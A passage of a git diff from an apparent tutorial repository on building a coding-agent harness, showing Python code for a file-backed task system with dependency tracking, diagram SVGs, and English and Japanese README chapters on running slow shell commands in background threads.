Agent name (multi-agent scenarios) + blockedBy: list[str] # Dependency task IDs + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + """Create a new task, save to .tasks/, return it.""" + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + 
subject=subject, + description=description, + status="pending", + owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + """Persist task to .tasks/{id}.json.""" + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + """Load task from disk.""" + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + """List all tasks from .tasks/ directory.""" + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + """Check if all blockedBy dependencies are completed.""" + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + """Claim a pending task: set owner, status -> in_progress.""" + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress (owner: {owner})\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + """Complete a task and report newly unblocked downstream tasks.""" + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + print(f" \033[33m[unblocked] {', 
'.join(unblocked)}\033[0m") + return msg + + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read_file, write_file, " + "create_task, list_tasks, claim_task, complete_task.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use create_task to break work " + "into subtasks with blockedBy dependencies.", + "skills": "Skills are available on demand.", + "memory": "Relevant memories from previous sessions are provided below.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and 
limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# Task tools + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks. Use create_task to add some." + lines = [] + for t in tasks: + icon = {"pending": "○", "in_progress": "●", + "completed": "✓"}.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} " + f"[{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": 
["path", "content"]}}, + {"name": "create_task", + "description": "Create a new task with optional blockedBy dependencies.", + "input_schema": {"type": "object", + "properties": { + "subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks with status, owner, and dependencies.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task. Sets owner, changes status to in_progress.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task. Reports unblocked downstream tasks.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, +} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop (from s11, simplified) ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", + "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) 
+ if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s12: task system") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "memories": ""} + while True: + try: + query = input("\033[36ms12 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s12_task_system/images/task-dag.en.svg b/s12_task_system/images/task-dag.en.svg new file mode 100644 index 000000000..6a075113d --- /dev/null +++ b/s12_task_system/images/task-dag.en.svg @@ -0,0 +1,59 @@ + + + + + + + + + + + + + Task DAG — Dependency Example: Database → API → Tests → Deploy + + + + ✓ schema + completed + + + + + + + + ● endpoints + in_progress · owner: agent-1 + + + ○ docs + pending · blockedBy: schema ✓ + + + + + + + + ○ tests + blockedBy: endpoints ● + + + + + + ○ deploy + blockedBy: tests, docs + + + + + completed + + in_progress + + pending + → blockedBy (arrows = dependency direction) + docs' blockedBy (schema) is completed → can_start returns True, can be claimed + diff --git a/s12_task_system/images/task-dag.ja.svg b/s12_task_system/images/task-dag.ja.svg new file mode 
100644 index 000000000..37ee46c9c --- /dev/null +++ b/s12_task_system/images/task-dag.ja.svg @@ -0,0 +1,59 @@ + + + + + + + + + + + + + Task DAG — 依存関係の例:データベース → API → テスト → デプロイ + + + + ✓ schema + completed + + + + + + + + ● endpoints + in_progress · owner: agent-1 + + + ○ docs + pending · blockedBy: schema ✓ + + + + + + + + ○ tests + blockedBy: endpoints ● + + + + + + ○ deploy + blockedBy: tests, docs + + + + + completed + + in_progress + + pending + → blockedBy(矢印 = 依存方向) + docs の blockedBy (schema) は完了済み → can_start が True を返し、claim 可能 + diff --git a/s12_task_system/images/task-dag.svg b/s12_task_system/images/task-dag.svg new file mode 100644 index 000000000..c044bd661 --- /dev/null +++ b/s12_task_system/images/task-dag.svg @@ -0,0 +1,59 @@ + + + + + + + + + + + + + Task DAG — 依赖关系示例:搭数据库 → API → 测试 → 部署 + + + + ✓ schema + completed + + + + + + + + ● endpoints + in_progress · owner: agent-1 + + + ○ docs + pending · blockedBy: schema ✓ + + + + + + + + ○ tests + blockedBy: endpoints ● + + + + + + ○ deploy + blockedBy: tests, docs + + + + + completed + + in_progress + + pending + → blockedBy(箭头 = 依赖方向) + docs 的 blockedBy (schema) 已完成 → can_start 返回 True,可被 claim + diff --git a/s12_task_system/images/task-system-overview.en.svg b/s12_task_system/images/task-system-overview.en.svg new file mode 100644 index 000000000..974303292 --- /dev/null +++ b/s12_task_system/images/task-system-overview.en.svg @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + Task System — 4 Task Tools + .tasks/ Persistence + blockedBy Dependencies + + + + s11 Preserved + + s12 New + + + + messages + + + + + prompt + compress + (s10-s11) + + + + + LLM (try/except) + (s11) + + + + + + TOOL_HANDLERS + bash · read · write + create_task · list_tasks + claim_task · complete_task + + + + + + + .tasks/ — Cross-session Persistence + task_xxx.json · task_yyy.json · task_zzz.json + {id, subject, description, status, owner, blockedBy} + Tutorial ID: timestamp + random | CC: sequential ID + 
highwatermark + + + + create / save / read + + + + Dependency Check + Lifecycle + can_start: all blockedBy completed? + claim_task → owner = agent, pending → in_progress + complete_task → completed + unblock downstream + + + + State Machine: + + pending + ─claim─→ + + in_progress + ─complete─→ + + completed + No release rollback; crash → unassign owner + + + + + s11 Preserved: loop, prompt assembly, compression (error recovery independent from task system) + + s12 New: Task dataclass + 4 tools + .tasks/ persistence + blockedBy dependency graph + diff --git a/s12_task_system/images/task-system-overview.ja.svg b/s12_task_system/images/task-system-overview.ja.svg new file mode 100644 index 000000000..b09c1a831 --- /dev/null +++ b/s12_task_system/images/task-system-overview.ja.svg @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + Task System — 4 つのタスクツール + .tasks/ 永続化 + blockedBy 依存 + + + + s11 保持 + + s12 新規 + + + + messages + + + + + prompt + compress + (s10-s11) + + + + + LLM (try/except) + (s11) + + + + + + TOOL_HANDLERS + bash · read · write + create_task · list_tasks + claim_task · complete_task + + + + + + + .tasks/ — セッション横断永続化 + task_xxx.json · task_yyy.json · task_zzz.json + {id, subject, description, status, owner, blockedBy} + チュートリアル ID: timestamp + random | CC: 順次 ID + highwatermark + + + + create / save / read + + + + 依存チェック + ライフサイクル + can_start: blockedBy がすべて completed? 
+ claim_task → owner = agent, pending → in_progress + complete_task → completed + 下流をアンロック + + + + 状態マシン: + + pending + ─claim─→ + + in_progress + ─complete─→ + + completed + release ロールバックなし、クラッシュ時は unassign で owner クリア + + + + + s11 保持:ループ、プロンプト組み立て、圧縮(エラーリカバリとタスクシステムは独立) + + s12 新規:Task dataclass + 4 ツール + .tasks/ 永続化 + blockedBy 依存グラフ + diff --git a/s12_task_system/images/task-system-overview.svg b/s12_task_system/images/task-system-overview.svg new file mode 100644 index 000000000..50dd8bec0 --- /dev/null +++ b/s12_task_system/images/task-system-overview.svg @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + Task System — 4 个任务工具 + .tasks/ 持久化 + blockedBy 依赖 + + + + s11 保留 + + s12 新增 + + + + messages + + + + + prompt + compress + (s10-s11) + + + + + LLM (try/except) + (s11) + + + + + + TOOL_HANDLERS + bash · read · write + create_task · list_tasks + claim_task · complete_task + + + + + + + .tasks/ — 跨会话持久化 + task_xxx.json · task_yyy.json · task_zzz.json + {id, subject, description, status, owner, blockedBy} + 教学版 ID: timestamp + random | CC: 顺序 ID + highwatermark + + + + create / save / read + + + + 依赖检查 + 生命周期 + can_start: blockedBy 全部 completed? + claim_task → owner = agent, pending → in_progress + complete_task → completed + 解锁下游 + + + + 状态机: + + pending + ─claim─→ + + in_progress + ─complete─→ + + completed + CC 无 release 回退,崩溃时用 unassign 清 owner + + + + + s11 保留:循环、prompt 组装、压缩(错误恢复与任务系统独立) + + s12 新增:Task dataclass + 4 个工具 + .tasks/ 持久化 + blockedBy 依赖图 + diff --git a/s13_background_tasks/README.en.md b/s13_background_tasks/README.en.md new file mode 100644 index 000000000..8eaf3e4aa --- /dev/null +++ b/s13_background_tasks/README.en.md @@ -0,0 +1,217 @@ +# s13: Background Tasks — Slow ops in the back, Agent keeps thinking + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s11 → s12 → `s13` → [s14](../s14_cron_scheduler/) → s15 → ... 
→ s19 +> *"Slow ops in the back, Agent keeps thinking"* — background threads run commands, inject notification when done. +> +> **Harness layer**: Background — async execution, doesn't block thinking. + +--- + +## The Problem + +Ever used a washing machine? You throw the clothes in, press start, and go do something else — cook, reply to messages, read a paper. 30 minutes later the machine beeps: done. You don't stand in front of it for 30 minutes doing nothing. + +The agent's bash tool is the same. `pip install torch` takes 10 minutes, `npm run build` takes 3 minutes. Once these commands start, the agent waits for the bash tool to return — it can't use that time to plan next steps or handle other tasks. + +Reading a file takes milliseconds — no waiting. `git status` returns in under a second — no waiting. But `npm install`? Minutes. The agent waits 10 minutes, doing absolutely nothing. **Synchronous execution wastes time the agent could spend thinking and planning.** + +--- + +## The Solution + +![Background Tasks Overview](images/background-tasks-overview.en.svg) + +s12's loop, task system, and prompt assembly are fully preserved. The only change: slow operations are dispatched to background threads, the agent keeps running its loop, and completed results are injected back into the conversation. + +Sync vs. Background: + +| | Sync (s12) | Background (s13) | +|---|---|---| +| Slow operations | Agent waits idle | Background thread executes | +| Agent idle | Yes | No, keeps thinking | +| Result | Returned immediately | Injected as notification next turn | +| Decision criteria | — | `is_slow_operation` heuristic | + +--- + +## How It Works + +### is_slow_operation: Fast vs. Slow Detection + +Not every operation goes to the background. File reads and `git status` finish in milliseconds — synchronous execution is faster than spinning up a thread. 
Only operations **likely to exceed 30 seconds** are worth backgrounding: + +```python +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) +``` + +The tutorial uses a keyword heuristic. CC's detection is more refined — it considers expected execution time, historical run times, and even user-configured timeout thresholds. + +### run_in_background: Background Execution + +Wrap the tool call in a worker function and dispatch it to a `threading.Thread(daemon=True)`. Results are stored in a `background_results` dictionary, protected by `threading.Lock`: + +```python +background_results: dict[str, str] = {} +background_lock = threading.Lock() + +def run_in_background(tool_use_id: str, fn, *args): + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + thread = threading.Thread(target=worker, daemon=True) + thread.start() +``` + +`daemon=True` ensures the thread exits when the agent process exits — no hanging. + +### collect_background_results: Collect Completed Results + +At the end of each loop iteration, check whether any background tasks have completed: + +```python +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + return ready +``` + +Remove completed results from the dictionary and return them. Not done yet? Check again next turn. 
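The two helpers above are self-contained enough to exercise outside the agent loop. A minimal standalone sketch — `slow_echo` is a stand-in for a real tool handler like `run_bash`:

```python
import threading
import time

background_results: dict[str, str] = {}
background_lock = threading.Lock()

def run_in_background(tool_use_id: str, fn, *args):
    def worker():
        result = fn(*args)
        with background_lock:
            background_results[tool_use_id] = result
    threading.Thread(target=worker, daemon=True).start()

def collect_background_results() -> dict[str, str]:
    with background_lock:
        ready = dict(background_results)
        background_results.clear()
        return ready

def slow_echo(msg: str) -> str:          # stands in for run_bash("npm install")
    time.sleep(0.2)
    return f"done: {msg}"

run_in_background("toolu_01", slow_echo, "npm install")
print(collect_background_results())      # {} — still running, agent keeps going
time.sleep(0.5)
print(collect_background_results())      # {'toolu_01': 'done: npm install'}
```

The first collect comes back empty because the worker is still sleeping — that is the turn the agent spends reading config files instead of idling. The second collect, one "turn" later, drains the finished result.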
+ +### Integration in the Loop + +Inside `agent_loop`, tool execution splits into two paths: + +```python +for block in response.content: + if block.type != "tool_use": + continue + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + +# Inject completed background results +bg_results = collect_background_results() +if bg_results: + messages.append({"role": "user", "content": [ + {"type": "tool_result", "tool_use_id": tid, "content": out} + for tid, out in bg_results.items()]}) +``` + +Slow operations first return a placeholder `[Running in background...]` — the LLM knows the command is still running and can do other things. When the background task finishes, the result is injected into messages as a new `tool_result` — the LLM sees it on the next turn. + +### Putting It Together + +``` +Turn 1: + LLM → bash "npm install" (slow) + → dispatch to background thread + → return "[Running in background...]" + → LLM: "OK, I'll check the install result later. Let me also read the config." + +Turn 2: + LLM → read_file "package.json" (fast, sync) + → return file content + → collect_background_results: npm install done! inject result + → LLM sees both: config file + install result +``` + +The agent didn't sit idle — while npm install ran in the background, it went and read the config file. 
+ +--- + +## Changes from s12 + +| Component | Before (s12) | After (s13) | +|-----------|-------------|-------------| +| Execution model | All synchronous | Slow ops in background thread + notification injection | +| New modules | — | `is_slow_operation`, `run_in_background`, `collect_background_results` | +| New types | — | `background_results: dict`, `background_lock: Lock` | +| Loop behavior | Tools execute serially | Slow ops async, fast ops sync, results collected each turn | +| Placeholder | — | `[Running in background...]` | +| Tools | 7 (s12) | 7 (unchanged — execution strategy changed) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s13_background_tasks/code.py +``` + +Try these prompts: + +1. `Run pip list AND find all Python files in this directory` +2. `Run npm install and while waiting, read package.json` +3. `Create a task to setup the project, then run pip list in the background` + +What to observe: Are slow operations (pip/npm) dispatched to the background? Does the agent do other work while waiting? Are background results injected back? + +--- + +## What's Next + +Background tasks solve "slow operations don't block." But what if you want something to happen **on a schedule**? Like "run tests every morning at 9 AM" or "check server status every 5 minutes"? + +s14 Cron Scheduler → Give the agent an alarm clock. + +
+Deep Dive into CC Source + +> The following is a complete analysis based on CC source code `query.ts` (lines 211, 1054-1060, 1411-1482), `services/toolUseSummary/toolUseSummaryGenerator.ts` (L15 prompt text), `LocalShellTask.tsx` (L24-25 constants, L59-98 watchdog logic), `messageQueueManager.ts` (notification queue), and `utils/task/framework.ts` (L267 `enqueueTaskNotification`). + +### 1. pendingToolUseSummary: Haiku Background Generation + +After each batch of tool executions, CC launches a **Haiku side-query** to generate a tool use summary. The initiation code is in `query.ts:1411-1482`, and the prompt text is defined in `services/toolUseSummary/toolUseSummaryGenerator.ts:15` (variable name `TOOL_USE_SUMMARY_SYSTEM_PROMPT`). The prompt says "Write a short summary label... think git-commit-subject, not sentence" — past tense, about 30 characters. + +The Haiku summary (~1s) completes during the main model's streaming generation (5-30s). Before the next turn starts, the summary is yielded out. The SDK consumes these summaries for mobile progress display. + +### 2. Thread Model: No Real Threads + +CC runs on the Node.js/Bun single-threaded event loop. "Background" just means "don't await." `ShellCommand.background(taskId)` redirects stdout/stderr to files and lets the process run independently. + +### 3. Seven Background Task Types + +CC defines **7 types** of background tasks (`Task.ts:7-13`): `local_bash`, `local_agent`, `remote_agent`, `in_process_teammate`, `local_workflow`, `monitor_mcp`, `dream`. Each has its own registration, lifecycle, and notification mechanism. + +### 4. Notification Injection: Command Queue + +When a background task completes, it is enqueued to a **shared command queue** via `enqueueTaskNotification` (`utils/task/framework.ts:267`) or `enqueuePendingNotification` (`messageQueueManager.ts`). 
The notification format is structured XML: + +```xml + + completed + Background command "npm test" completed (exit code 0) + +``` + +Priority is split into `next` > `later` (`messageQueueManager.ts`). Background tasks default to `later` (don't block user input). The consumption point is at `query.ts:1566-1593`. + +### 5. Stall Watchdog + +Background bash tasks have a watchdog (`LocalShellTask.tsx` L24-25 constants, L59-98 logic) — it periodically checks whether output has stalled. After 45 seconds with no growth, it detects interactive prompts (`(y/n)` etc.) to prevent background tasks from getting stuck on unanswered interactive dialogs. + +### 6. Concurrency Limits + +Foreground tool calls: `CLAUDE_CODE_MAX_TOOL_USE_CONCURRENCY` (default 10 concurrent safe tools). Background bash tasks: no hard limit — they are independent subprocesses. + +
+ + diff --git a/s13_background_tasks/README.ja.md b/s13_background_tasks/README.ja.md new file mode 100644 index 000000000..b3235fabe --- /dev/null +++ b/s13_background_tasks/README.ja.md @@ -0,0 +1,217 @@ +# s13: Background Tasks — 遅い操作はバックグラウンドへ、Agent は考え続ける + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s11 → s12 → `s13` → [s14](../s14_cron_scheduler/) → s15 → ... → s19 +> *"遅い操作はバックグラウンドへ、Agent は考え続ける"* — バックグラウンドスレッドでコマンド実行、完了時に通知を注入。 +> +> **Harness 層**: バックグラウンド — 非同期実行、思考をブロックしない。 + +--- + +## 課題 + +洗濯機を使ったことはあるか? 衣服を放り込んでスタートを押し、別のことをする — 料理、メッセージ返信、論文を読む。30 分後に洗濯機が「ピピピ」と知らせる:完了。洗濯機の前で 30 分ぼーっと待つ人はいない。 + +Agent の bash ツールも同じ。`pip install torch` は 10 分、`npm run build` は 3 分かかる。これらのコマンドが走り出すと、Agent は bash ツールの戻りを待つ — この時間を使って次の計画を立てたり、別のタスクを処理したりできない。 + +ファイル読み込みはミリ秒級、待たない。`git status` は 1 秒以内に戻る、待たない。しかし `npm install` は? 分単位。Agent は 10 分待ち、何もしない。**同期実行により、Agent は本来なら思考や計画に使える時間を遅い操作で浪費している。** + +--- + +## 解決策 + +![Background Tasks Overview](images/background-tasks-overview.ja.svg) + +s12 のループ、タスクシステム、プロンプト組み立てはすべて保持。唯一の変更:遅い操作をバックグラウンドスレッドに回し、Agent はループを継続、バックグラウンド完了後に結果を対話に注入する。 + +同期 vs バックグラウンド: + +| | 同期 (s12) | バックグラウンド (s13) | +|---|---|---| +| 遅い操作 | Agent が待機 | バックグラウンドスレッドで実行 | +| Agent の空き | あり | なし、考え続ける | +| 結果 | 即時返却 | 次ラウンドで通知注入 | +| 判断基準 | — | `is_slow_operation` ヒューリスティック | + +--- + +## 仕組み + +### is_slow_operation: 高速か低速かの判定 + +すべての操作をバックグラウンドに回すわけではない。ファイル読み込みや `git status` のようなミリ秒級操作は、スレッドを立てるより同期的に実行した方が速い。**30 秒を超える可能性のある**操作だけがバックグラウンドに送られる: + +```python +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) +``` + +教育版はキーワードヒューリスティックを使用。CC の判定はより精密 — コマンドの予想実行時間、履歴実行時間、さらにはユーザー設定のタイムアウト閾値を見る。 + +### 
run_in_background: バックグラウンド実行 + +ツール呼び出しを worker 関数にラップし、`threading.Thread(daemon=True)` で実行。結果は `background_results` 辞書に格納、`threading.Lock` で保護: + +```python +background_results: dict[str, str] = {} +background_lock = threading.Lock() + +def run_in_background(tool_use_id: str, fn, *args): + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + thread = threading.Thread(target=worker, daemon=True) + thread.start() +``` + +`daemon=True` により、Agent プロセス終了時にスレッドも一緒に終了し、ハングしない。 + +### collect_background_results: 結果の収集 + +各ラウンドの終了時に、バックグラウンドタスクが完了しているか確認: + +```python +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + return ready +``` + +完了した結果を辞書からクリアし、呼び出し元に返却。未完了のものは — 次ラウンドで再チェック。 + +### ループ内での統合 + +agent_loop で、ツール実行は 2 つのルートに分かれる: + +```python +for block in response.content: + if block.type != "tool_use": + continue + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + +# 完了したバックグラウンド結果を注入 +bg_results = collect_background_results() +if bg_results: + messages.append({"role": "user", "content": [ + {"type": "tool_result", "tool_use_id": tid, "content": out} + for tid, out in bg_results.items()]}) +``` + +遅い操作にはまずプレースホルダー `[Running in background...]` を返し、LLM はこのコマンドがまだ実行中であることを知り、先に別のことをできる。バックグラウンド完了後、結果は新しい `tool_result` として messages に注入 — LLM は次ラウンドで確認可能。 + +### 組み合わせて実行 + +``` +Turn 1: + LLM → bash "npm install" (slow) + → dispatch to background thread + → return "[Running in background...]" + → LLM: "OK, I'll check the install result later. Let me also read the config." 
+ +Turn 2: + LLM → read_file "package.json" (fast, sync) + → return file content + → collect_background_results: npm install done! inject result + → LLM sees both: config file + install result +``` + +Agent は待機していない — npm install がバックグラウンドで走っている間に、設定ファイルを読みに行った。 + +--- + +## s12 からの変更点 + +| コンポーネント | 変更前 (s12) | 変更後 (s13) | +|--------------|------------|------------| +| 実行モデル | すべて同期 | 遅い操作はバックグラウンドスレッド + 通知注入 | +| 新規モジュール | — | `is_slow_operation`, `run_in_background`, `collect_background_results` | +| 新規型 | — | `background_results: dict`, `background_lock: Lock` | +| ループ動作 | ツールの逐次実行 | 遅い操作は非同期、速い操作は同期、結果は各ラウンドで収集 | +| プレースホルダー | — | `[Running in background...]` | +| ツール | 7 (s12) | 7(変更なし、実行戦略が変わっただけ) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s13_background_tasks/code.py +``` + +以下のプロンプトを試してください: + +1. `Run pip list AND find all Python files in this directory` +2. `Run npm install and while waiting, read package.json` +3. `Create a task to setup the project, then run pip list in the background` + +観察ポイント:遅い操作(pip/npm)はバックグラウンドに送られているか? Agent は待っている間に別のことをしているか? バックグラウンド結果は注入して戻ってきているか? + +--- + +## 次のステップ + +バックグラウンドタスクは「遅い操作がブロックしない」問題を解決した。しかし、何かを**定期的に**実行したい場合はどうする? 例えば「毎朝 9 時にテスト実行」「5 分ごとにサーバーステータスをチェック」? + +s14 Cron Scheduler → Agent にアラームを取り付ける。 + +
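本章の `run_in_background` / `collect_background_results` パターンは、LLM なしでも単体で動作確認できる。以下は最小の動作スケッチ(2 つの関数は本文のものをそのまま再掲、`fake_slow_tool` はデモ用に仮定した関数):

```python
import threading
import time

background_results: dict[str, str] = {}
background_lock = threading.Lock()

def run_in_background(tool_use_id, fn, *args):
    def worker():
        result = fn(*args)
        with background_lock:
            background_results[tool_use_id] = result
    threading.Thread(target=worker, daemon=True).start()

def collect_background_results() -> dict[str, str]:
    with background_lock:
        ready = dict(background_results)
        background_results.clear()
    return ready

def fake_slow_tool(name: str) -> str:
    time.sleep(0.3)  # npm install の代わりの遅い処理
    return f"{name}: done"

run_in_background("tool_1", fake_slow_tool, "npm install")
print(collect_background_results())  # 直後はまだ実行中 → 空の dict
time.sleep(0.5)
print(collect_background_results())  # 完了後の回収 → {'tool_1': 'npm install: done'}
```

1 回目の回収が空で、2 回目に結果が返る — これが「プレースホルダーを返す → 次ラウンドで注入する」の最小形。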
+CC ソースコード深掘り + +> 以下は CC ソースコード `query.ts`(211, 1054-1060, 1411-1482 行)、`services/toolUseSummary/toolUseSummaryGenerator.ts`(L15 プロンプトテキスト)、`LocalShellTask.tsx`(L24-25 定数, L59-98 ウォッチドッグロジック)、`messageQueueManager.ts`(通知キュー)、`utils/task/framework.ts`(L267 `enqueueTaskNotification`)の完全分析に基づく。 + +### 一、pendingToolUseSummary:Haiku のバックグラウンド生成 + +CC はツール実行の各バッチ完了後、**Haiku side-query** を起動してツール使用要約を生成する。呼び出しコードは `query.ts:1411-1482`、プロンプトテキストは `services/toolUseSummary/toolUseSummaryGenerator.ts:15`(変数名 `TOOL_USE_SUMMARY_SYSTEM_PROMPT`)に定義。指示は "Write a short summary label... think git-commit-subject, not sentence" — 過去形、約 30 文字。 + +Haiku 要約(~1s)はメインモデルのストリーミング生成(5-30s)中に完了。次ラウンド開始前に、要約を yield。SDK はこの要約を消費してモバイル版の進捗表示に使用。 + +### 二、スレッドモデル:本当のスレッドはない + +CC は Node.js/Bun のシングルスレッドイベントループ上で動作する。「バックグラウンド」とは単に「await しない」こと。`ShellCommand.background(taskId)` は stdout/stderr をファイルにリダイレクトし、プロセスを独立して実行させる。 + +### 三、7 種のバックグラウンドタスクタイプ + +CC は **7 